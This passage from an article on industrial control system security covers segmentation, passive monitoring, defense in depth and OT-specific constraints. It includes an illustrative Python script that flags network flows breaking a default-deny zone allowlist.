    • Deploy deep traffic inspection technologies.
    • Apply physical access controls to OT system components.
    • Implement passive monitoring of ICS networks to detect anomalous communications and raise alerts.
  3. Defense in depth: It is highly recommended to implement layered security strategies similar to IT network architectures, taking into account the following characteristics of OT:
    • Antivirus and security software on end devices are uncommon and in many cases impossible to deploy.
    • Patch installation is infrequent.
    • Change management is quite complex and difficult for operations areas to achieve.
    • 24x7x365 availability is required.
    • Security awareness is low; physical security programs are common but logical security programs are not.
    • The impact of any disruption to a service is critical and can lead to legal, physical or social consequences.
    • Audits or security posture tests are infrequent.
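The segmentation, default-deny and passive-monitoring premises from the list above, combined into one check, as an added example that is not the article's own code or any vendor's product. A Python script assigns each address to an IT, DMZ or OT zone, permits only the (source zone, destination zone, protocol, port) tuples on an allowlist, refuses direct IT-to-OT traffic outright, and reports every other flow observed on a passive tap. The zone addressing, the allowlist entries, the port 2222 entry and all sample flows are constructed assumptions; Modbus/TCP on port 502 is the one real protocol reference.

```python
"""Toy passive ICS flow monitor: default-deny allowlist between zones.
Added example; addressing, allowlist and sample flows are constructed."""
import ipaddress

# Constructed zone addressing for the example topology.
ZONES = {
    "IT":  ipaddress.ip_network("10.10.0.0/16"),
    "DMZ": ipaddress.ip_network("10.20.0.0/24"),
    "OT":  ipaddress.ip_network("192.168.100.0/24"),
}

# Allowed (src_zone, dst_zone, proto, dst_port). Anything else is denied
# by default, which is the "permit only by exception" premise.
ALLOW = {
    ("DMZ", "OT", "tcp", 502),   # DMZ historian/jump host polls PLCs over Modbus/TCP
    ("IT", "DMZ", "tcp", 443),   # IT users reach the DMZ over HTTPS only
    ("OT", "OT", "tcp", 502),    # PLC-to-PLC Modbus/TCP inside the OT zone
    ("OT", "OT", "udp", 2222),   # assumed intra-OT I/O traffic
}


def zone_of(ip):
    """Map an address to its zone name, or UNKNOWN if it is in no zone."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "UNKNOWN"


def check_flow(src, dst, proto, dport):
    """Return None if the flow is permitted, otherwise the reason it is not."""
    sz, dz = zone_of(src), zone_of(dst)
    if "UNKNOWN" in (sz, dz):
        return f"unknown zone: {src}->{dst}"
    if sz == "IT" and dz == "OT":
        # Segmentation rule: IT never talks to OT directly, only via the DMZ.
        return "direct IT->OT traffic (must traverse the DMZ)"
    if (sz, dz, proto, dport) not in ALLOW:
        return f"not in allowlist: {sz}->{dz} {proto}/{dport}"
    return None


def monitor(flows):
    """Passive check over observed flows; returns alert tuples, never blocks."""
    alerts = []
    for src, dst, proto, dport in flows:
        reason = check_flow(src, dst, proto, dport)
        if reason:
            alerts.append((src, dst, proto, dport, reason))
    return alerts


# Constructed flows as a passive tap might report them: (src, dst, proto, dport).
SAMPLE_FLOWS = [
    ("10.20.0.5", "192.168.100.10", "tcp", 502),        # allowed: DMZ -> PLC Modbus
    ("10.10.3.7", "192.168.100.10", "tcp", 502),        # IT workstation straight to a PLC
    ("192.168.100.10", "203.0.113.9", "tcp", 443),      # PLC talking to an outside address
    ("10.20.0.5", "192.168.100.10", "tcp", 22),         # SSH to a PLC, not on the allowlist
    ("192.168.100.11", "192.168.100.10", "tcp", 502),   # allowed: intra-OT Modbus
]


if __name__ == "__main__":
    for src, dst, proto, dport, reason in monitor(SAMPLE_FLOWS):
        print(f"ALERT {src} -> {dst} {proto}/{dport}: {reason}")
```

The monitor only raises alerts, in keeping with the availability-first priority of OT: the allowlist is the same table the perimeter firewall would enforce, so a hit here means either a misconfigured device, a rule the firewall is missing, or traffic that deserves an incident ticket.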

Some control and security tools deployed in IT networks work adequately in OT; however, there are companies specializing in these systems that offer suitable monitoring and control of industrial devices, such as Sentryo (recently acquired by Cisco), Claroty, Veracity Industrial Networks, Dragos and others. These companies have agreements with the major OT device brands and manufacturers such as Emerson, Honeywell, Rockwell Automation, Schneider, Siemens, etc., to guarantee interoperability between platforms, devices and security tools.

In conclusion, implementing security programs for OT networks and systems is important because of the industry's particular characteristics and the constant increase in attacks and threats against these systems; Stuxnet was a turning point for the industry, marking historic milestones in the development of malware specialized in industrial equipment. For this reason it is mandatory that corporate security policies, the deployment of specialized monitoring, and cyber-risk analysis and management be constantly updated and reviewed by specialized teams within companies.
